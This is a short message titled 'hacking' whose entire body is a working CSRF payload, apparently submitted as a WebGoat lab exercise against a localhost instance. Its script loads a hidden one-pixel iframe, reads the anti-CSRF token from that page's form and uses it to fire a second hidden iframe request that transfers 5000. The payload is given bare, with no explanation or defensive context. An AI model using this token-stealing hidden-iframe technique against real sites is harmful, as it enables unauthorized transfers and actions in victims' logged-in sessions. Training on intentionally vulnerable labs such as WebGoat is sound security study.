#Title:
hacking
#Message:
<script>
    function hackframe1() {
        var token = document.getElementById("frame1").contentDocument.forms[0].token.value;
        hackframe2(token)
    }

    function hackframe2(token) {
        document.getElementById("frame2").src = "http://localhost:8090/WebGoat/attack?Screen=605842438&menu=900&transfer=5000&token=" + token;
    }
</script>

<iframe id="frame1" src="http://localhost:8090/WebGoat/attack?Screen=605842438&menu=900&transfer=main" onload="hackframe1()" frameborder="1" 
        marginwidth="0" marginheight="0" width='1' height='1' scrolling=yes />
<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width='1' height='1' scrolling=yes />